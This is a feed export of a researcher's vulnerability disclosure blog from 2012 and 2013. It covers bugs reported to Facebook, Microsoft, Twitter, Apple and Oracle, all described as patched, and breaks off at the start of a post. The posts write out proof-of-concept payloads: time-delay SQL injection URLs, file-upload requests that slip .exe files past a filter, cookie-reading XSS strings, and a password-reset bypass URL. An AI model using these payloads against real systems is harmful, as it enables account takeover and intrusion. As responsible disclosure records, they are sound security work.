tag:blogger.com,1999:blog-5669690670831382582013-05-14T18:00:47.478+08:00Sow Ching Shiong - Vulnerability ResearchSow Ching Shiong - Vulnerability ResearchSow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.comBlogger26125tag:blogger.com,1999:blog-566969067083138258.post-5437818230039648832013-01-07T15:01:00.001+08:002013-01-07T15:01:13.853+08:002013-01-07T15:01:13.853+08:00Facebook Bug #4: Password Reset Vulnerability Found in www.facebook.com<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Sow Ching Shiong, an independent vulnerability researcher has discovered a Password Reset vulnerability in www.facebook.com, which can be exploited by an attacker to bypass certain security restrictions.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In normal circumstances, an authenticated Facebook user is required to enter his/her current password on the change password page to prevent an unauthorized person from changing the password without the user's knowledge.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"></span>
<span style="font-family: Verdana, sans-serif;">However, an attacker can change/reset a user's password without knowing the user's current password by accessing this URL directly: <a href="https://www.facebook.com/hacked">https://www.facebook.com/hacked</a>.</span><br />
<span style="font-family: Verdana, sans-serif;">After that, the page will be redirected to <a href="https://www.facebook.com/checkpoint/checkpointme?f=[userid]&r=web_hacked">https://www.facebook.com/checkpoint/checkpointme?f=[userid]&r=web_hacked</a></span><br />
<span style="font-family: Verdana, sans-serif;">Now, the attacker can click "Continue" to change/reset the user's password.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<b style="font-family: Verdana, sans-serif;">Step 1: Logon to Facebook and access </b><span style="font-family: Verdana, sans-serif;"><b>this URL directly: <a href="https://www.facebook.com/hacked">https://www.facebook.com/hacked</a>. The page will be redirected to <a href="https://www.facebook.com/checkpoint/checkpointme?f=[userid]&r=web_hacked">https://www.facebook.com/checkpoint/checkpointme?f=[userid]&r=web_hacked</a></b></span><br />
<div style="text-align: left;">
</div>
<a href="http://3.bp.blogspot.com/-a0iupJPuTHw/UOalk1AwoJI/AAAAAAAAAJ4/dl8V940Eb5Y/s1600/Step+1.png"><img border="0" src="http://3.bp.blogspot.com/-a0iupJPuTHw/UOalk1AwoJI/AAAAAAAAAJ4/dl8V940Eb5Y/s400/Step+1.png" /></a>
<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<br />
<b style="font-family: Verdana, sans-serif;">Step 2: Click on "Continue" to proceed</b><br />
<div style="text-align: left;">
</div>
<a href="http://1.bp.blogspot.com/-We8JgQp9l-E/UOajruHWk-I/AAAAAAAAAJc/B44l1FLLsIQ/s1600/Step+2.png"><img border="0" src="http://1.bp.blogspot.com/-We8JgQp9l-E/UOajruHWk-I/AAAAAAAAAJc/B44l1FLLsIQ/s400/Step+2.png" /></a>
<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<br />
<b style="font-family: Verdana, sans-serif;">Step 3: Enter "New Password" and "Confirm Password" to change/reset the password.</b><br />
<a href="http://3.bp.blogspot.com/-QC3HSYvuYug/UOamA-oK7bI/AAAAAAAAAKA/1jDzvZ4ifC8/s1600/Step+3.png"><img border="0" src="http://3.bp.blogspot.com/-QC3HSYvuYug/UOamA-oK7bI/AAAAAAAAAKA/1jDzvZ4ifC8/s400/Step+3.png" /></a>
<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<br />
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Conclusion</span></b><br />This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.<br /><br /><b><span style="color: orange;">Facebook White Hat</span></b></span><br />
<a href="https://www.facebook.com/whitehat" style="font-family: Verdana, sans-serif;" target="_blank">https://www.facebook.com/whitehat</a><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/2V739h3_u-4" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com26http://chingshiong.blogspot.com/2013/01/facebook-bug-4-password-reset.htmltag:blogger.com,1999:blog-566969067083138258.post-57793284586423690342012-07-12T10:44:00.001+08:002012-07-12T10:56:38.988+08:002012-07-12T10:56:38.988+08:00Microsoft Bug #2: Blind SQL Injection Vulnerability Found in careers.microsoft.com<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Sow Ching Shiong, an independent vulnerability researcher has discovered a Blind SQL Injection vulnerability in careers.microsoft.com, which can be exploited by an attacker to conduct Blind SQL injection attacks.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept URLs which will cause a time delay of 25 seconds are provided below:</b><br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">http://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=all&dv=1));WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en</span></li>
<li><span style="font-family: Verdana, sans-serif;">http://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=1));WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en</span></li>
<li><span style="font-family: Verdana, sans-serif;">https://careers.microsoft.com/search.aspx?ss=xss&jc=all&pr=all&dv=1));WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en</span></li>
<li><span style="font-family: Verdana, sans-serif;">https://careers.microsoft.com/search.aspx?ss=xss&jc=all&pr=1));WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en</span></li>
</ul><br />
<div class="separator" style="clear: both; text-align: left;">
<a href="http://2.bp.blogspot.com/-oi6pkjlwUSE/T_45eEF8riI/AAAAAAAAAI0/nIs23g9VAIM/s1600/PoC+(careers.microsoft.com).png"><img border="0" src="http://2.bp.blogspot.com/-oi6pkjlwUSE/T_45eEF8riI/AAAAAAAAAI0/nIs23g9VAIM/s400/PoC+(careers.microsoft.com).png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Conclusion</span></b><br />This vulnerability has been confirmed and patched by Microsoft Security Team. I would like to thank them for their quick response to my report.<br /><br /><b><span style="color: orange;">Microsoft White Hat</span></b></span><br />
<a href="http://technet.microsoft.com/en-us/security/cc308575" style="font-family: Verdana, sans-serif;" target="_blank">http://technet.microsoft.com/en-us/security/cc308575</a><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/xn4Dhqe1_e0" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/07/microsoft-bug-2-blind-sql-injection.htmltag:blogger.com,1999:blog-566969067083138258.post-40426030247839785812012-05-11T12:22:00.000+08:002013-01-04T17:59:08.614+08:002013-01-04T17:59:08.614+08:00Facebook Bug #3: Arbitrary File Upload Vulnerability Found in attachments.facebook.com<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">HTTP Request</span></span>
<br />
<div style="font-family: 'Times New Roman';">
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">===========</span></span></div>
<span style="font-family: Verdana, sans-serif;">POST /ajax/messaging/upload.php HTTP/1.1</span><br />
<span style="font-family: Verdana, sans-serif;">Accept: text/html, application/xhtml+xml, */*</span><br />
<span style="font-family: Verdana, sans-serif;">Accept-Language: en-US</span><br />
<span style="font-family: Verdana, sans-serif;">User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Type: multipart/form-data; boundary=---------------------------7db2e171a0068</span><br />
<span style="font-family: Verdana, sans-serif;">Accept-Encoding: gzip, deflate</span><br />
<span style="font-family: Verdana, sans-serif;">Host: attachments.facebook.com</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Length: 194182</span><br />
<span style="font-family: Verdana, sans-serif;">Proxy-Connection: Keep-Alive</span><br />
<span style="font-family: Verdana, sans-serif;">Pragma: no-cache</span><br />
<span style="font-family: Verdana, sans-serif;">Cookie: [information removed]</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">-----------------------------7db2e171a0068</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Disposition: form-data; name="post_form_id"</span>
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">[information removed]</span><br />
<span style="font-family: Verdana, sans-serif;">-----------------------------7db2e171a0068</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Disposition: form-data; name="fb_dtsg"</span>
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">[information removed]</span><br />
<span style="font-family: Verdana, sans-serif;">-----------------------------7db2e171a0068</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Disposition: form-data; name="id"</span>
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">[information removed]</span><br />
<span style="font-family: Verdana, sans-serif;">-----------------------------7db2e171a0068</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Disposition: form-data; name="attachment"; filename="..exe"</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Type: application/octet-stream</span><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://4.bp.blogspot.com/-bBljM4D1kS4/T6ySQuwW6OI/AAAAAAAAAIo/crrwO4FLAe0/s1600/FB3.png"><img border="0" src="http://4.bp.blogspot.com/-bBljM4D1kS4/T6ySQuwW6OI/AAAAAAAAAIo/crrwO4FLAe0/s400/FB3.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Conclusion</span></b><br />This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.<br /><br /><b><span style="color: orange;">Facebook White Hat</span></b></span><br />
<a href="https://www.facebook.com/whitehat" style="font-family: Verdana, sans-serif;" target="_blank">https://www.facebook.com/whitehat</a><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/HTPW4zVnuJk" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/05/facebook-bug-3-arbitrary-file-upload.htmltag:blogger.com,1999:blog-566969067083138258.post-61350408759424745952012-05-03T17:17:00.001+08:002012-05-11T14:42:59.447+08:002012-05-11T14:42:59.447+08:00Facebook Bug #2: Arbitrary File Upload Vulnerability Found in attachments.facebook.com<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">HTTP Request</span></span>
<br />
<div style="font-family: 'Times New Roman';">
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">===========</span></span></div>
<span style="font-family: Verdana, sans-serif;">POST /ajax/messaging/upload.php HTTP/1.1</span><br />
<span style="font-family: Verdana, sans-serif;">Host: attachments.facebook.com</span><br />
<span style="font-family: Verdana, sans-serif;">User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1</span><br />
<span style="font-family: Verdana, sans-serif;">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br />
<span style="font-family: Verdana, sans-serif;">Accept-Language: en-us,en;q=0.5</span><br />
<span style="font-family: Verdana, sans-serif;">Accept-Encoding: gzip, deflate</span><br />
<span style="font-family: Verdana, sans-serif;">Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7</span><br />
<span style="font-family: Verdana, sans-serif;">DNT: 1</span><br />
<span style="font-family: Verdana, sans-serif;">Proxy-Connection: keep-alive</span><br />
<span style="font-family: Verdana, sans-serif;">Cookie: [information removed]</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Type: multipart/form-data; boundary=---------------------------265001916915724</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Length: 194200</span><br /><br />
<span style="font-family: Verdana, sans-serif;">-----------------------------265001916915724</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Disposition: form-data; name="post_form_id"</span>
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">[information removed]
</span><br />
<span style="font-family: Verdana, sans-serif;">-----------------------------265001916915724</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Disposition: form-data; name="fb_dtsg"</span>
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">[information removed]
</span><br />
<span style="font-family: Verdana, sans-serif;">-----------------------------265001916915724</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Disposition: form-data; name="id"</span>
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">[information removed]
</span><br />
<span style="font-family: Verdana, sans-serif;">-----------------------------265001916915724</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Disposition: form-data; name="attachment"; filename="notepad.exe."</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Type: application/octet-stream</span><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://1.bp.blogspot.com/-4Z3s8eH9Kzw/T6JMn0K13zI/AAAAAAAAAIc/qDOVS5UKulk/s1600/FB2.png"><img border="0" src="http://1.bp.blogspot.com/-4Z3s8eH9Kzw/T6JMn0K13zI/AAAAAAAAAIc/qDOVS5UKulk/s400/FB2.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Conclusion</span></b><br />This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.<br /><br /><b><span style="color: orange;">Facebook White Hat</span></b></span><br />
<a href="https://www.facebook.com/whitehat" style="font-family: Verdana, sans-serif;" target="_blank">https://www.facebook.com/whitehat</a><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/vXNDUHgIZoQ" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/05/facebook-bug-2-arbitrary-file-upload.htmltag:blogger.com,1999:blog-566969067083138258.post-35357734924697506552012-05-03T17:04:00.001+08:002012-07-12T10:47:28.954+08:002012-07-12T10:47:28.954+08:00Microsoft Bug #1: Cross-Site Scripting (XSS) Found in connect.microsoft.com<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in connect.microsoft.com, which can be exploited by an attacker to conduct XSS attacks.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;">Tested in IE9 with XSS filter enabled</span><br />
<span style="font-family: Verdana, sans-serif;">============================</span><br />
<span style="font-family: Verdana, sans-serif;">http://connect.microsoft.com/sqlserver/searchresults.aspx?UserHandle=%2522%253E%2527%253E%253Cscript%2520%253Ealert%2528/XSS by Sow Ching Shiong/%2529%253B%253C%252Fscript%2520%253E</span><br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<a href="http://3.bp.blogspot.com/-4r5aCfNrMjU/T6JJGS7m6rI/AAAAAAAAAIQ/D1KkyeiL8ao/s1600/PoC+(IE9+with+XSS+filter+enabled).png" imageanchor="1"><img border="0" src="http://3.bp.blogspot.com/-4r5aCfNrMjU/T6JJGS7m6rI/AAAAAAAAAIQ/D1KkyeiL8ao/s400/PoC+(IE9+with+XSS+filter+enabled).png" /></a><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Conclusion</span></b><br />This vulnerability has been confirmed and patched by Microsoft Security Team. I would like to thank them for their quick response to my report.<br /><br /><b><span style="color: orange;">Microsoft White Hat</span></b></span><br />
<a href="http://technet.microsoft.com/en-us/security/cc308575" style="font-family: Verdana, sans-serif;" target="_blank">http://technet.microsoft.com/en-us/security/cc308575</a><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/-NsgnuJJ3c8" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/05/microsoft-bug-1-cross-site-scripting.htmltag:blogger.com,1999:blog-566969067083138258.post-37159106374327889082012-05-03T16:50:00.002+08:002012-05-11T14:43:15.231+08:002012-05-11T14:43:15.231+08:00Facebook Bug #1: Arbitrary File Upload Vulnerability Found in attachments.facebook.com<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">HTTP Request</span></span>
<br />
<div style="font-family: 'Times New Roman';">
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">===========</span></span></div>
<span style="font-family: Verdana, sans-serif;">POST /ajax/messaging/upload.php HTTP/1.1</span><br />
<span style="font-family: Verdana, sans-serif;">Host: attachments.facebook.com</span><br />
<span style="font-family: Verdana, sans-serif;">User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1</span><br />
<span style="font-family: Verdana, sans-serif;">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br />
<span style="font-family: Verdana, sans-serif;">Accept-Language: en-us,en;q=0.5</span><br />
<span style="font-family: Verdana, sans-serif;">Accept-Encoding: gzip, deflate</span><br />
<span style="font-family: Verdana, sans-serif;">Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7</span><br />
<span style="font-family: Verdana, sans-serif;">DNT: 1</span><br />
<span style="font-family: Verdana, sans-serif;">Proxy-Connection: keep-alive</span><br />
<span style="font-family: Verdana, sans-serif;">Cookie: [information removed]</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Type: multipart/form-data; boundary=---------------------------4827543632391</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Length: 194188</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">-----------------------------4827543632391</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Disposition: form-data; name="post_form_id"</span>
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">[information removed]
</span><br />
<span style="font-family: Verdana, sans-serif;">-----------------------------4827543632391</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Disposition: form-data; name="fb_dtsg"</span>
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">[information removed]
</span><br />
<span style="font-family: Verdana, sans-serif;">-----------------------------4827543632391</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Disposition: form-data; name="id"</span>
<span style="font-family: Verdana, sans-serif;"><br /></span><br />
<span style="font-family: Verdana, sans-serif;">[information removed]
</span><br />
<span style="font-family: Verdana, sans-serif;">-----------------------------4827543632391</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Disposition: form-data; name="attachment"; filename="notepad.EXE"</span><br />
<span style="font-family: Verdana, sans-serif;">Content-Type: application/octet-stream</span>
<br /><br />
<div class="separator" style="clear: both; text-align: left;">
<a href="http://2.bp.blogspot.com/-lGwcITS0bK4/T6JGIKuKewI/AAAAAAAAAIE/Wq1QoILNRpM/s1600/FB1.png"><img border="0" src="http://2.bp.blogspot.com/-lGwcITS0bK4/T6JGIKuKewI/AAAAAAAAAIE/Wq1QoILNRpM/s400/FB1.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Conclusion</span></b><br />This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.<br /><br /><b><span style="color: orange;">Facebook White Hat</span></b></span><br />
<a href="https://www.facebook.com/whitehat" style="font-family: Verdana, sans-serif;" target="_blank">https://www.facebook.com/whitehat</a><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/8SLMJ--V7_0" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/05/facebook-bug-1-arbitrary-file-upload.htmltag:blogger.com,1999:blog-566969067083138258.post-85173313467230792132012-04-29T17:38:00.001+08:002012-05-11T14:44:07.616+08:002012-05-11T14:44:07.616+08:00Twitter Bug #1: Cross-Site Scripting (XSS) Found in twitter.com<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in twitter.com, which can be exploited by an attacker to conduct XSS attacks.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;">https://twitter.com/intent/follow?original_referer=javascript:alert(document.cookie);&region=follow_link&screen_name=twitterapi&source=followbutton&variant=2.0</span><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="http://2.bp.blogspot.com/-MnPxlYrV7z0/T50L3jZb3pI/AAAAAAAAAGI/zU_4zPhdzk8/s1600/PoC+1+(twitter.com).png"><img border="0" src="http://2.bp.blogspot.com/-MnPxlYrV7z0/T50L3jZb3pI/AAAAAAAAAGI/zU_4zPhdzk8/s400/PoC+1+(twitter.com).png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Conclusion</span></b><br />This vulnerability has been confirmed and patched by Twitter Security Team. I would like to thank them for their quick response to my report.<br /><br /><b><span style="color: orange;">Twitter White Hat</span></b></span><br />
<a href="https://twitter.com/about/security" style="font-family: Verdana, sans-serif;" target="_blank">https://twitter.com/about/security</a><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/KFFlEQ3URXw" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/twitter-bug-1-cross-site-scripting-xss.htmltag:blogger.com,1999:blog-566969067083138258.post-9891918923230770422012-04-29T17:27:00.002+08:002012-05-11T14:44:28.686+08:002012-05-11T14:44:28.686+08:00Apple Bug #1: Cross-Site Scripting (XSS) Found in consultants.apple.com<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in consultants.apple.com, which can be exploited by an attacker to conduct XSS attacks.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b><br />
<span style="font-family: Verdana, sans-serif;">http://consultants.apple.com/au/locator_results.php?sl=AU&citystate=VIC&page=2<script>alert(document.cookie)</script></span><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="http://2.bp.blogspot.com/-oOV1sZHo7iQ/T50HzpwwUxI/AAAAAAAAAF8/bwT7g09pQKQ/s1600/PoC+(consultants.apple.com).png"><img border="0" src="http://2.bp.blogspot.com/-oOV1sZHo7iQ/T50HzpwwUxI/AAAAAAAAAF8/bwT7g09pQKQ/s400/PoC+(consultants.apple.com).png" /></a></div>
<br />
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Conclusion</span></b><br />This vulnerability has been confirmed and patched by Apple Security Team. I would like to thank them for their quick response to my report.<br /><br /><b><span style="color: orange;">Apple White Hat</span></b></span><br />
<a href="http://support.apple.com/kb/HT1318" style="font-family: Verdana, sans-serif;" target="_blank">http://support.apple.com/kb/HT1318</a><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/1Vd1-tkXg7Q" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/xss-found-in-apple.htmltag:blogger.com,1999:blog-566969067083138258.post-7675714197954624712012-04-29T12:01:00.002+08:002012-05-11T14:45:46.227+08:002012-05-11T14:45:46.227+08:00Oracle iPlanet Web Server 7.0.9 Multiple Cross-Site Scripting (XSS) Vulnerabilities<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
<span style="font-family: Verdana, sans-serif;">Oracle iPlanet Web Server is a web server designed for medium and large business applications. Oracle iPlanet Web Server builds on the earlier Sun ONE Web Server, iPlanet Web Server, and Netscape Enterprise Server products.<br /><br />Sow Ching Shiong, an independent vulnerability researcher has discovered multiple Cross-Site Scripting vulnerabilities in Oracle iPlanet Web Server. These issues were discovered in a default installation of Oracle iPlanet Web Server 7.0.9. Other earlier versions may also be affected.</span><br />
<br />
<b style="color: orange; font-family: Verdana, sans-serif;">Proof of concept</b>
<span style="font-family: Verdana, sans-serif;"></span><br />
<span style="font-family: Verdana, sans-serif;">Reflected XSS</span><br />
<span style="font-family: Verdana, sans-serif;">===========</span><br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc='"--></style></script><script>alert(/XSS/)</script>&versionFile=../version/copyright?__token__=&productNameHeight=42&productNameWidth=221</span></li>
<li><span style="font-family: Verdana, sans-serif;">http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&versionFile=../version/copyright?__token__=&productNameHeight='"--></style></script><script>alert(/XSS/)</script>&productNameWidth=221</span></li>
<li><span style="font-family: Verdana, sans-serif;">http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&versionFile=../version/copyright?__token__=&productNameHeight=42&productNameWidth='"--></style></script><script>alert(/XSS/)</script></span></li>
</ul>
<br />
<span style="font-family: Verdana, sans-serif;">Stored XSS</span><br />
<span style="font-family: Verdana, sans-serif;">=========</span><br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName='"--></style></script><script>alert(/Stored XSS 1/)</script>&helpFile=&pathPrefix=</span></li>
<li><span style="font-family: Verdana, sans-serif;">http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName=admingui&helpFile=&pathPrefix='"--></style></script><script>alert(/Stored XSS 2/)</script></span></li>
</ul>
<br />
<span style="font-family: Verdana, sans-serif;">To trigger Stored XSS:</span><br />
<span style="font-family: Verdana, sans-serif;">=================</span><br />
<span style="font-family: Verdana, sans-serif;">http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName=TESTING&helpFile=&pathPrefix=</span><br />
<br />
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Solution</span></b><br />Oracle has released patches which address these issues. Please see the references for more information.<br /><br /><b><span style="color: orange;">References</span></b></span><br />
<span style="font-family: Verdana, sans-serif;">Vendor URL: </span><a href="http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html#AppendixSUNS" style="font-family: Verdana, sans-serif;" target="_blank">http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html#AppendixSUNS</a><br />
<span style="font-family: Verdana, sans-serif;">Secunia: </span><a href="http://secunia.com/advisories/43942/" style="font-family: Verdana, sans-serif;" target="_blank">http://secunia.com/advisories/43942/</a>
<br />
<br />
<span style="font-family: Verdana, sans-serif;"><b><span style="color: orange;">Disclosure Timeline</span></b><br />2011-03-29 - Vulnerabilities discovered.<br />2011-03-29 - Vulnerabilities reported to Secunia.<br />2011-04-07 - Secunia confirmed the vulnerabilities and contacted the vendor.<br />2012-04-17 - Patch released.<br />2012-04-18 - Advisory published by Secunia.</span><img src="http://feeds.feedburner.com/~r/SowChingShiong-VulnerabilityResearch/~4/6VADuQr_1eM" height="1" width="1"/>Sow Ching Shionghttp://www.blogger.com/profile/03730833188821859155noreply@blogger.com0http://chingshiong.blogspot.com/2012/04/oracle-iplanet-web-server-709-multiple.htmltag:blogger.com,1999:blog-566969067083138258.post-82688438555774314302012-04-29T03:50:00.002+08:002012-05-11T14:46:06.109+08:002012-05-11T14:46:06.109+08:00Apache Camel 2.7.0 Multiple Cross-Site Scripting (XSS) Vulnerabilities<b style="font-family: Verdana, sans-serif;"><span style="color: orange;">Description</span></b><br />
